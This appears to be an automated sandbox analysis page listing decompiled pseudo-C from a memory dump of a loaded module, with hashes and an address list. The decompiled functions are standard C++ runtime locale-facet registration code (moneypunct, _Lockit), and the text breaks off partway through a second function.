Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: d62c7d40d11129f2f5e5ccaf3107cc0bd4120f68d40ad55067edfae7671bfb1c
Instruction ID: 0cf3da71255439a8acf546b93b7e7438ea7695fb59441a2a2dfec952350669b0
Opcode Fuzzy Hash: d62c7d40d11129f2f5e5ccaf3107cc0bd4120f68d40ad55067edfae7671bfb1c
Instruction Fuzzy Hash: 2311C276908219DBCF01FBA4C840AFEB7B4AF45318F270009F511AB290DFB4AA01CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDF567, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6DDDF567(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t181;
				signed int _t182;
				void* _t194;
				void* _t207;
				void* _t220;
				void* _t233;
				void* _t246;
				void* _t259;
				void* _t272;
				void* _t285;
				void* _t298;
				void* _t311;
				void* _t324;
				signed int _t473;
				signed int _t513;
				signed int _t514;
				signed int _t515;
				signed int _t516;
				signed int _t517;
				signed int _t518;
				signed int _t519;
				signed int _t520;
				signed int _t521;
				signed int _t522;
				signed int _t523;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				signed int _t529;
				signed int _t530;
				signed int _t531;
				signed int _t532;
				signed int _t533;
				signed int _t534;
				signed int _t535;
				signed int _t536;
				signed int _t537;
				void* _t550;

				_t510 = __edx;
				_t389 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t550 - 0x14, 0);
				_t525 =  *0x6de96df8; // 0x0
				 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
				 *(_t550 - 0x10) = _t525;
				_t181 = E6DDB161C(0x6de96da4);
				_t392 =  *((intOrPtr*)(_t550 + 8));
				_t182 = E6DDB171B( *((intOrPtr*)(_t550 + 8)), _t181);
				_t512 = _t182;
				if(_t182 != 0) {
					L5:
					E6DDD66BA(_t550 - 0x14);
					return E6DDF0075(_t512);
				} else {
					if(_t525 == 0) {
						_push( *((intOrPtr*)(_t550 + 8)));
						_push(_t550 - 0x10);
						__eflags = E6DDE1127(__ebx, _t392, __edx, _t512, _t525) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t550 - 0x20);
							E6DDF3D74(_t550 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t512, _t525, 0x14);
							E6DDD6653(_t550 - 0x14, 0);
							_t526 =  *0x6de96df4; // 0x0
							 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
							 *(_t550 - 0x10) = _t526;
							_t194 = E6DDB161C(0x6de96da0);
							_t399 =  *((intOrPtr*)(_t550 + 8));
							_t513 = E6DDB171B( *((intOrPtr*)(_t550 + 8)), _t194);
							__eflags = _t513;
							if(_t513 != 0) {
								L12:
								E6DDD66BA(_t550 - 0x14);
								return E6DDF0075(_t513);
							} else {
								__eflags = _t526;
								if(_t526 == 0) {
									_push( *((intOrPtr*)(_t550 + 8)));
									_push(_t550 - 0x10);
									__eflags = E6DDE11AB(_t389, _t399, __edx, _t513, _t526) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t550 - 0x20);
										E6DDF3D74(_t550 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t389, _t513, _t526, 0x14);
										E6DDD6653(_t550 - 0x14, 0);
										_t527 =  *0x6de96dc8; // 0x0
										 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
										 *(_t550 - 0x10) = _t527;
										_t207 = E6DDB161C(0x6de96d7c);
										_t406 =  *((intOrPtr*)(_t550 + 8));
										_t514 = E6DDB171B( *((intOrPtr*)(_t550 + 8)), _t207);
										__eflags = _t514;
										if(_t514 != 0) {
											L19:
											E6DDD66BA(_t550 - 0x14);
											return E6DDF0075(_t514);
										} else {
											__eflags = _t527;
											if(_t527 == 0) {
												_push( *((intOrPtr*)(_t550 + 8)));
												_push(_t550 - 0x10);
												__eflags = E6DDE1230(_t389, _t406, __edx, _t514, _t527) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t550 - 0x20);
													E6DDF3D74(_t550 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t389, _t514, _t527, 0x14);
													E6DDD6653(_t550 - 0x14, 0);
													_t528 =  *0x6de96dc4; // 0x0
													 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
													 *(_t550 - 0x10) = _t528;
													_t220 = E6DDB161C(0x6de96d78);
													_t413 =  *((intOrPtr*)(_t550 + 8));
													_t515 = E6DDB171B( *((intOrPtr*)(_t550 + 8)), _t220);
													__eflags = _t515;
													if(_t515 != 0) {
														L26:
														E6DDD66BA(_t550 - 0x14);
														return E6DDF0075(_t515);
													} else {
														__eflags = _t528;
														if(_t528 == 0) {
															_push( *((intOrPtr*)(_t550 + 8)));
															_push(_t550 - 0x10);
															__eflags = E6DDE12B4(_t389, _t413, _t510, _t515, _t528) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438(_t550 - 0x20);
																E6DDF3D74(_t550 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t389, _t515, _t528, 0x14);
																E6DDD6653(_t550 - 0x14, 0);
																_t529 =  *0x6de96dd8; // 0x0
																 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																 *(_t550 - 0x10) = _t529;
																_t233 = E6DDB161C(0x6de96d84);
																_t420 =  *((intOrPtr*)(_t550 + 8));
																_t516 = E6DDB171B( *((intOrPtr*)(_t550 + 8)), _t233);
																__eflags = _t516;
																if(_t516 != 0) {
																	L33:
																	E6DDD66BA(_t550 - 0x14);
																	return E6DDF0075(_t516);
																} else {
																	__eflags = _t529;
																	if(_t529 == 0) {
																		_push( *((intOrPtr*)(_t550 + 8)));
																		_push(_t550 - 0x10);
																		__eflags = E6DDE1339(_t389, _t420, _t510, _t516, _t529) - 0xffffffff;
																		if(__eflags == 0) {
																			E6DDB1438(_t550 - 0x20);
																			E6DDF3D74(_t550 - 0x20, 0x6de93504);
																			asm("int3");
																			E6DDF00AC(0x6de383cf, _t389, _t516, _t529, 0x14);
																			E6DDD6653(_t550 - 0x14, 0);
																			_t530 =  *0x6de96db0; // 0x0
																			 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																			 *(_t550 - 0x10) = _t530;
																			_t246 = E6DDB161C(0x6de96d64);
																			_t427 =  *((intOrPtr*)(_t550 + 8));
																			_t517 = E6DDB171B( *((intOrPtr*)(_t550 + 8)), _t246);
																			__eflags = _t517;
																			if(_t517 != 0) {
																				L40:
																				E6DDD66BA(_t550 - 0x14);
																				return E6DDF0075(_t517);
																			} else {
																				__eflags = _t530;
																				if(_t530 == 0) {
																					_push( *((intOrPtr*)(_t550 + 8)));
																					_push(_t550 - 0x10);
																					__eflags = E6DDE13A1(_t389, _t427, _t510, _t517, _t530) - 0xffffffff;
																					if(__eflags == 0) {
																						E6DDB1438(_t550 - 0x20);
																						E6DDF3D74(_t550 - 0x20, 0x6de93504);
																						asm("int3");
																						E6DDF00AC(0x6de383cf, _t389, _t517, _t530, 0x14);
																						E6DDD6653(_t550 - 0x14, 0);
																						_t531 =  *0x6de96ddc; // 0x0
																						 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																						 *(_t550 - 0x10) = _t531;
																						_t259 = E6DDB161C(0x6de96d88);
																						_t434 =  *((intOrPtr*)(_t550 + 8));
																						_t518 = E6DDB171B( *((intOrPtr*)(_t550 + 8)), _t259);
																						__eflags = _t518;
																						if(_t518 != 0) {
																							L47:
																							E6DDD66BA(_t550 - 0x14);
																							return E6DDF0075(_t518);
																						} else {
																							__eflags = _t531;
																							if(_t531 == 0) {
																								_push( *((intOrPtr*)(_t550 + 8)));
																								_push(_t550 - 0x10);
																								__eflags = E6DDE1409(_t389, _t434, _t510, _t518, _t531) - 0xffffffff;
																								if(__eflags == 0) {
																									E6DDB1438(_t550 - 0x20);
																									E6DDF3D74(_t550 - 0x20, 0x6de93504);
																									asm("int3");
																									E6DDF00AC(0x6de383cf, _t389, _t518, _t531, 0x14);
																									E6DDD6653(_t550 - 0x14, 0);
																									_t532 =  *0x6de96de0; // 0x0
																									 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																									 *(_t550 - 0x10) = _t532;
																									_t272 = E6DDB161C(0x6de96d8c);
																									_t441 =  *((intOrPtr*)(_t550 + 8));
																									_t519 = E6DDB171B( *((intOrPtr*)(_t550 + 8)), _t272);
																									__eflags = _t519;
																									if(_t519 != 0) {
																										L54:
																										E6DDD66BA(_t550 - 0x14);
																										return E6DDF0075(_t519);
																									} else {
																										__eflags = _t532;
																										if(_t532 == 0) {
																											_push( *((intOrPtr*)(_t550 + 8)));
																											_push(_t550 - 0x10);
																											__eflags = E6DDE1471(_t389, _t441, _t510, _t519, _t532) - 0xffffffff;
																											if(__eflags == 0) {
																												E6DDB1438(_t550 - 0x20);
																												E6DDF3D74(_t550 - 0x20, 0x6de93504);
																												asm("int3");
																												E6DDF00AC(0x6de383cf, _t389, _t519, _t532, 0x14);
																												E6DDD6653(_t550 - 0x14, 0);
																												_t533 =  *0x6de96dfc; // 0x0
																												 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																												 *(_t550 - 0x10) = _t533;
																												_t285 = E6DDB161C(0x6de96da8);
																												_t448 =  *((intOrPtr*)(_t550 + 8));
																												_t520 = E6DDB171B( *((intOrPtr*)(_t550 + 8)), _t285);
																												__eflags = _t520;
																												if(_t520 != 0) {
																													L61:
																													E6DDD66BA(_t550 - 0x14);
																													return E6DDF0075(_t520);
																												} else {
																													__eflags = _t533;
																													if(_t533 == 0) {
																														_push( *((intOrPtr*)(_t550 + 8)));
																														_push(_t550 - 0x10);
																														__eflags = E6DDE14EC(_t389, _t448, _t510, _t520, _t533) - 0xffffffff;
																														if(__eflags == 0) {
																															E6DDB1438(_t550 - 0x20);
																															E6DDF3D74(_t550 - 0x20, 0x6de93504);
																															asm("int3");
																															E6DDF00AC(0x6de383cf, _t389, _t520, _t533, 0x14);
																															E6DDD6653(_t550 - 0x14, 0);
																															_t534 =  *0x6de96dcc; // 0x0
																															 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																															 *(_t550 - 0x10) = _t534;
																															_t298 = E6DDB161C(0x6de96d80);
																															_t455 =  *((intOrPtr*)(_t550 + 8));
																															_t521 = E6DDB171B( *((intOrPtr*)(_t550 + 8)), _t298);
																															__eflags = _t521;
																															if(_t521 != 0) {
																																L68:
																																E6DDD66BA(_t550 - 0x14);
																																return E6DDF0075(_t521);
																															} else {
																																__eflags = _t534;
																																if(_t534 == 0) {
																																	_push( *((intOrPtr*)(_t550 + 8)));
																																	_push(_t550 - 0x10);
																																	__eflags = E6DDE1558(_t389, _t455, _t510, _t521, _t534) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6DDB1438(_t550 - 0x20);
																																		E6DDF3D74(_t550 - 0x20, 0x6de93504);
																																		asm("int3");
																																		E6DDF00AC(0x6de383cf, _t389, _t521, _t534, 0x14);
																																		E6DDD6653(_t550 - 0x14, 0);
																																		_t535 =  *0x6de96e00; // 0x0
																																		 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																																		 *(_t550 - 0x10) = _t535;
																																		_t311 = E6DDB161C(0x6de96dac);
																																		_t462 =  *((intOrPtr*)(_t550 + 8));
																																		_t522 = E6DDB171B( *((intOrPtr*)(_t550 + 8)), _t311);
																																		__eflags = _t522;
																																		if(_t522 != 0) {
																																			L75:
																																			E6DDD66BA(_t550 - 0x14);
																																			return E6DDF0075(_t522);
																																		} else {
																																			__eflags = _t535;
																																			if(_t535 == 0) {
																																				_push( *((intOrPtr*)(_t550 + 8)));
																																				_push(_t550 - 0x10);
																																				__eflags = E6DDE15C4(_t389, _t462, _t510, _t522, _t535) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6DDB1438(_t550 - 0x20);
																																					E6DDF3D74(_t550 - 0x20, 0x6de93504);
																																					asm("int3");
																																					E6DDF00AC(0x6de383cf, _t389, _t522, _t535, 0x14);
																																					E6DDD6653(_t550 - 0x14, 0);
																																					_t536 =  *0x6de96dd0; // 0x0
																																					 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																																					 *(_t550 - 0x10) = _t536;
																																					_t324 = E6DDB161C(0x6de96d60);
																																					_t469 =  *((intOrPtr*)(_t550 + 8));
																																					_t523 = E6DDB171B( *((intOrPtr*)(_t550 + 8)), _t324);
																																					__eflags = _t523;
																																					if(_t523 != 0) {
																																						L82:
																																						E6DDD66BA(_t550 - 0x14);
																																						return E6DDF0075(_t523);
																																					} else {
																																						__eflags = _t536;
																																						if(_t536 == 0) {
																																							_push( *((intOrPtr*)(_t550 + 8)));
																																							_push(_t550 - 0x10);
																																							__eflags = E6DDE162A(_t389, _t469, _t510, _t523, _t536) - 0xffffffff;
																																							if(__eflags == 0) {
																																								_t473 = _t550 - 0x20;
																																								E6DDB1438(_t473);
																																								E6DDF3D74(_t550 - 0x20, 0x6de93504);
																																								asm("int3");
																																								E6DDF00AC(0x6de3851f, _t389, _t523, _t536, 4);
																																								_t537 = _t473;
																																								 *(_t550 - 0x10) = _t537;
																																								 *((intOrPtr*)(_t537 + 4)) =  *((intOrPtr*)(_t550 + 0xc));
																																								_push( *((intOrPtr*)(_t550 + 0x14)));
																																								_t175 = _t550 - 4;
																																								 *_t175 =  *(_t550 - 4) & 0x00000000;
																																								__eflags =  *_t175;
																																								 *_t537 = 0x6de3c0c4;
																																								 *((char*)(_t537 + 0x28)) =  *((intOrPtr*)(_t550 + 0x10));
																																								E6DDE542F(_t389, _t473, _t510, _t523, _t537,  *_t175);
																																								return E6DDF0075(_t537,  *((intOrPtr*)(_t550 + 8)));
																																							} else {
																																								_t523 =  *(_t550 - 0x10);
																																								 *(_t550 - 0x10) = _t523;
																																								 *(_t550 - 4) = 1;
																																								E6DDD6FD3(__eflags, _t523);
																																								 *0x6de3a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t523 + 4))))();
																																								 *0x6de96dd0 = _t523;
																																								goto L82;
																																							}
																																						} else {
																																							_t523 = _t536;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t522 =  *(_t550 - 0x10);
																																					 *(_t550 - 0x10) = _t522;
																																					 *(_t550 - 4) = 1;
																																					E6DDD6FD3(__eflags, _t522);
																																					 *0x6de3a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t522 + 4))))();
																																					 *0x6de96e00 = _t522;
																																					goto L75;
																																				}
																																			} else {
																																				_t522 = _t535;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t521 =  *(_t550 - 0x10);
																																		 *(_t550 - 0x10) = _t521;
																																		 *(_t550 - 4) = 1;
																																		E6DDD6FD3(__eflags, _t521);
																																		 *0x6de3a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t521 + 4))))();
																																		 *0x6de96dcc = _t521;
																																		goto L68;
																																	}
																																} else {
																																	_t521 = _t534;
																																	goto L68;
																																}
																															}
																														} else {
																															_t520 =  *(_t550 - 0x10);
																															 *(_t550 - 0x10) = _t520;
																															 *(_t550 - 4) = 1;
																															E6DDD6FD3(__eflags, _t520);
																															 *0x6de3a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t520 + 4))))();
																															 *0x6de96dfc = _t520;
																															goto L61;
																														}
																													} else {
																														_t520 = _t533;
																														goto L61;
																													}
																												}
																											} else {
																												_t519 =  *(_t550 - 0x10);
																												 *(_t550 - 0x10) = _t519;
																												 *(_t550 - 4) = 1;
																												E6DDD6FD3(__eflags, _t519);
																												 *0x6de3a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t519 + 4))))();
																												 *0x6de96de0 = _t519;
																												goto L54;
																											}
																										} else {
																											_t519 = _t532;
																											goto L54;
																										}
																									}
																								} else {
																									_t518 =  *(_t550 - 0x10);
																									 *(_t550 - 0x10) = _t518;
																									 *(_t550 - 4) = 1;
																									E6DDD6FD3(__eflags, _t518);
																									 *0x6de3a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t518 + 4))))();
																									 *0x6de96ddc = _t518;
																									goto L47;
																								}
																							} else {
																								_t518 = _t531;
																								goto L47;
																							}
																						}
																					} else {
																						_t517 =  *(_t550 - 0x10);
																						 *(_t550 - 0x10) = _t517;
																						 *(_t550 - 4) = 1;
																						E6DDD6FD3(__eflags, _t517);
																						 *0x6de3a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t517 + 4))))();
																						 *0x6de96db0 = _t517;
																						goto L40;
																					}
																				} else {
																					_t517 = _t530;
																					goto L40;
																				}
																			}
																		} else {
																			_t516 =  *(_t550 - 0x10);
																			 *(_t550 - 0x10) = _t516;
																			 *(_t550 - 4) = 1;
																			E6DDD6FD3(__eflags, _t516);
																			 *0x6de3a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t516 + 4))))();
																			 *0x6de96dd8 = _t516;
																			goto L33;
																		}
																	} else {
																		_t516 = _t529;
																		goto L33;
																	}
																}
															} else {
																_t515 =  *(_t550 - 0x10);
																 *(_t550 - 0x10) = _t515;
																 *(_t550 - 4) = 1;
																E6DDD6FD3(__eflags, _t515);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t515 + 4))))();
																 *0x6de96dc4 = _t515;
																goto L26;
															}
														} else {
															_t515 = _t528;
															goto L26;
														}
													}
												} else {
													_t514 =  *(_t550 - 0x10);
													 *(_t550 - 0x10) = _t514;
													 *(_t550 - 4) = 1;
													E6DDD6FD3(__eflags, _t514);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t514 + 4))))();
													 *0x6de96dc8 = _t514;
													goto L19;
												}
											} else {
												_t514 = _t527;
												goto L19;
											}
										}
									} else {
										_t513 =  *(_t550 - 0x10);
										 *(_t550 - 0x10) = _t513;
										 *(_t550 - 4) = 1;
										E6DDD6FD3(__eflags, _t513);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t513 + 4))))();
										 *0x6de96df4 = _t513;
										goto L12;
									}
								} else {
									_t513 = _t526;
									goto L12;
								}
							}
						} else {
							_t512 =  *(_t550 - 0x10);
							 *(_t550 - 0x10) = _t512;
							 *(_t550 - 4) = 1;
							E6DDD6FD3(__eflags, _t512);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t512 + 4))))();
							 *0x6de96df8 = _t512;
							goto L5;
						}
					} else {
						_t512 = _t525;
						goto L5;
					}
				}
			}

0x6dddf567
0x6dddf567
0x6dddf56e
0x6dddf578
0x6dddf57d
0x6dddf588
0x6dddf58c
0x6dddf58f
0x6dddf594
0x6dddf598
0x6dddf59d
0x6dddf5a1
0x6dddf5e6
0x6dddf5e9
0x6dddf5f5
0x6dddf5a3
0x6dddf5a5
0x6dddf5ab
0x6dddf5b1
0x6dddf5b9
0x6dddf5bc
0x6dddf5f9
0x6dddf607
0x6dddf60c
0x6dddf614
0x6dddf61e
0x6dddf623
0x6dddf62e
0x6dddf632
0x6dddf635
0x6dddf63a
0x6dddf643
0x6dddf645
0x6dddf647
0x6dddf68c
0x6dddf68f
0x6dddf69b
0x6dddf649
0x6dddf649
0x6dddf64b
0x6dddf651
0x6dddf657
0x6dddf65f
0x6dddf662
0x6dddf69f
0x6dddf6ad
0x6dddf6b2
0x6dddf6ba
0x6dddf6c4
0x6dddf6c9
0x6dddf6d4
0x6dddf6d8
0x6dddf6db
0x6dddf6e0
0x6dddf6e9
0x6dddf6eb
0x6dddf6ed
0x6dddf732
0x6dddf735
0x6dddf741
0x6dddf6ef
0x6dddf6ef
0x6dddf6f1
0x6dddf6f7
0x6dddf6fd
0x6dddf705
0x6dddf708
0x6dddf745
0x6dddf753
0x6dddf758
0x6dddf760
0x6dddf76a
0x6dddf76f
0x6dddf77a
0x6dddf77e
0x6dddf781
0x6dddf786
0x6dddf78f
0x6dddf791
0x6dddf793
0x6dddf7d8
0x6dddf7db
0x6dddf7e7
0x6dddf795
0x6dddf795
0x6dddf797
0x6dddf79d
0x6dddf7a3
0x6dddf7ab
0x6dddf7ae
0x6dddf7eb
0x6dddf7f9
0x6dddf7fe
0x6dddf806
0x6dddf810
0x6dddf815
0x6dddf820
0x6dddf824
0x6dddf827
0x6dddf82c
0x6dddf835
0x6dddf837
0x6dddf839
0x6dddf87e
0x6dddf881
0x6dddf88d
0x6dddf83b
0x6dddf83b
0x6dddf83d
0x6dddf843
0x6dddf849
0x6dddf851
0x6dddf854
0x6dddf891
0x6dddf89f
0x6dddf8a4
0x6dddf8ac
0x6dddf8b6
0x6dddf8bb
0x6dddf8c6
0x6dddf8ca
0x6dddf8cd
0x6dddf8d2
0x6dddf8db
0x6dddf8dd
0x6dddf8df
0x6dddf924
0x6dddf927
0x6dddf933
0x6dddf8e1
0x6dddf8e1
0x6dddf8e3
0x6dddf8e9
0x6dddf8ef
0x6dddf8f7
0x6dddf8fa
0x6dddf937
0x6dddf945
0x6dddf94a
0x6dddf952
0x6dddf95c
0x6dddf961
0x6dddf96c
0x6dddf970
0x6dddf973
0x6dddf978
0x6dddf981
0x6dddf983
0x6dddf985
0x6dddf9ca
0x6dddf9cd
0x6dddf9d9
0x6dddf987
0x6dddf987
0x6dddf989
0x6dddf98f
0x6dddf995
0x6dddf99d
0x6dddf9a0
0x6dddf9dd
0x6dddf9eb
0x6dddf9f0
0x6dddf9f8
0x6dddfa02
0x6dddfa07
0x6dddfa12
0x6dddfa16
0x6dddfa19
0x6dddfa1e
0x6dddfa27
0x6dddfa29
0x6dddfa2b
0x6dddfa70
0x6dddfa73
0x6dddfa7f
0x6dddfa2d
0x6dddfa2d
0x6dddfa2f
0x6dddfa35
0x6dddfa3b
0x6dddfa43
0x6dddfa46
0x6dddfa83
0x6dddfa91
0x6dddfa96
0x6dddfa9e
0x6dddfaa8
0x6dddfaad
0x6dddfab8
0x6dddfabc
0x6dddfabf
0x6dddfac4
0x6dddfacd
0x6dddfacf
0x6dddfad1
0x6dddfb16
0x6dddfb19
0x6dddfb25
0x6dddfad3
0x6dddfad3
0x6dddfad5
0x6dddfadb
0x6dddfae1
0x6dddfae9
0x6dddfaec
0x6dddfb29
0x6dddfb37
0x6dddfb3c
0x6dddfb44
0x6dddfb4e
0x6dddfb53
0x6dddfb5e
0x6dddfb62
0x6dddfb65
0x6dddfb6a
0x6dddfb73
0x6dddfb75
0x6dddfb77
0x6dddfbbc
0x6dddfbbf
0x6dddfbcb
0x6dddfb79
0x6dddfb79
0x6dddfb7b
0x6dddfb81
0x6dddfb87
0x6dddfb8f
0x6dddfb92
0x6dddfbcf
0x6dddfbdd
0x6dddfbe2
0x6dddfbea
0x6dddfbf4
0x6dddfbf9
0x6dddfc04
0x6dddfc08
0x6dddfc0b
0x6dddfc10
0x6dddfc19
0x6dddfc1b
0x6dddfc1d
0x6dddfc62
0x6dddfc65
0x6dddfc71
0x6dddfc1f
0x6dddfc1f
0x6dddfc21
0x6dddfc27
0x6dddfc2d
0x6dddfc35
0x6dddfc38
0x6dddfc75
0x6dddfc83
0x6dddfc88
0x6dddfc90
0x6dddfc9a
0x6dddfc9f
0x6dddfcaa
0x6dddfcae
0x6dddfcb1
0x6dddfcb6
0x6dddfcbf
0x6dddfcc1
0x6dddfcc3
0x6dddfd08
0x6dddfd0b
0x6dddfd17
0x6dddfcc5
0x6dddfcc5
0x6dddfcc7
0x6dddfccd
0x6dddfcd3
0x6dddfcdb
0x6dddfcde
0x6dddfd18
0x6dddfd1b
0x6dddfd29
0x6dddfd2e
0x6dddfd36
0x6dddfd3b
0x6dddfd3d
0x6dddfd43
0x6dddfd46
0x6dddfd4f
0x6dddfd4f
0x6dddfd4f
0x6dddfd53
0x6dddfd59
0x6dddfd5c
0x6dddfd68
0x6dddfce0
0x6dddfce0
0x6dddfce3
0x6dddfce7
0x6dddfceb
0x6dddfcf8
0x6dddfd00
0x6dddfd02
0x00000000
0x6dddfd02
0x6dddfcc9
0x6dddfcc9
0x00000000
0x6dddfcc9
0x6dddfcc7
0x6dddfc3a
0x6dddfc3a
0x6dddfc3d
0x6dddfc41
0x6dddfc45
0x6dddfc52
0x6dddfc5a
0x6dddfc5c
0x00000000
0x6dddfc5c
0x6dddfc23
0x6dddfc23
0x00000000
0x6dddfc23
0x6dddfc21
0x6dddfb94
0x6dddfb94
0x6dddfb97
0x6dddfb9b
0x6dddfb9f
0x6dddfbac
0x6dddfbb4
0x6dddfbb6
0x00000000
0x6dddfbb6
0x6dddfb7d
0x6dddfb7d
0x00000000
0x6dddfb7d
0x6dddfb7b
0x6dddfaee
0x6dddfaee
0x6dddfaf1
0x6dddfaf5
0x6dddfaf9
0x6dddfb06
0x6dddfb0e
0x6dddfb10
0x00000000
0x6dddfb10
0x6dddfad7
0x6dddfad7
0x00000000
0x6dddfad7
0x6dddfad5
0x6dddfa48
0x6dddfa48
0x6dddfa4b
0x6dddfa4f
0x6dddfa53
0x6dddfa60
0x6dddfa68
0x6dddfa6a
0x00000000
0x6dddfa6a
0x6dddfa31
0x6dddfa31
0x00000000
0x6dddfa31
0x6dddfa2f
0x6dddf9a2
0x6dddf9a2
0x6dddf9a5
0x6dddf9a9
0x6dddf9ad
0x6dddf9ba
0x6dddf9c2
0x6dddf9c4
0x00000000
0x6dddf9c4
0x6dddf98b
0x6dddf98b
0x00000000
0x6dddf98b
0x6dddf989
0x6dddf8fc
0x6dddf8fc
0x6dddf8ff
0x6dddf903
0x6dddf907
0x6dddf914
0x6dddf91c
0x6dddf91e
0x00000000
0x6dddf91e
0x6dddf8e5
0x6dddf8e5
0x00000000
0x6dddf8e5
0x6dddf8e3
0x6dddf856
0x6dddf856
0x6dddf859
0x6dddf85d
0x6dddf861
0x6dddf86e
0x6dddf876
0x6dddf878
0x00000000
0x6dddf878
0x6dddf83f
0x6dddf83f
0x00000000
0x6dddf83f
0x6dddf83d
0x6dddf7b0
0x6dddf7b0
0x6dddf7b3
0x6dddf7b7
0x6dddf7bb
0x6dddf7c8
0x6dddf7d0
0x6dddf7d2
0x00000000
0x6dddf7d2
0x6dddf799
0x6dddf799
0x00000000
0x6dddf799
0x6dddf797
0x6dddf70a
0x6dddf70a
0x6dddf70d
0x6dddf711
0x6dddf715
0x6dddf722
0x6dddf72a
0x6dddf72c
0x00000000
0x6dddf72c
0x6dddf6f3
0x6dddf6f3
0x00000000
0x6dddf6f3
0x6dddf6f1
0x6dddf664
0x6dddf664
0x6dddf667
0x6dddf66b
0x6dddf66f
0x6dddf67c
0x6dddf684
0x6dddf686
0x00000000
0x6dddf686
0x6dddf64d
0x6dddf64d
0x00000000
0x6dddf64d
0x6dddf64b
0x6dddf5be
0x6dddf5be
0x6dddf5c1
0x6dddf5c5
0x6dddf5c9
0x6dddf5d6
0x6dddf5de
0x6dddf5e0
0x00000000
0x6dddf5e0
0x6dddf5a7
0x6dddf5a7
0x00000000
0x6dddf5a7
0x6dddf5a5

APIs

__EH_prolog3.LIBCMT ref: 6DDDF56E
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDF578
int.LIBCPMT ref: 6DDDF58F

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

moneypunct.LIBCPMT ref: 6DDDF5B2
std::_Facet_Register.LIBCPMT ref: 6DDDF5C9
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDF5E9
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDF607

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: 7b3e8ec89c72630c9b2f3c55914a234fcb70e0b522f45884a856bf373829ce68
Instruction ID: bbf2cf14f6da7ee62b644b220c3622372ad07b1e536659c19691d81e7bf8cfad
Opcode Fuzzy Hash: 7b3e8ec89c72630c9b2f3c55914a234fcb70e0b522f45884a856bf373829ce68
Instruction Fuzzy Hash: 7311A076908119DBCF01FBA4C840ABEB775AF94318F260019F621AB290DF749A018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDEB7F2, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6DDEB7F2(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t111;
				signed int _t112;
				void* _t124;
				void* _t137;
				void* _t150;
				void* _t163;
				void* _t176;
				void* _t189;
				signed int _t283;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				void* _t330;

				_t305 = __edx;
				_t234 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t330 - 0x14, 0);
				_t315 =  *0x6de96e2c; // 0x0
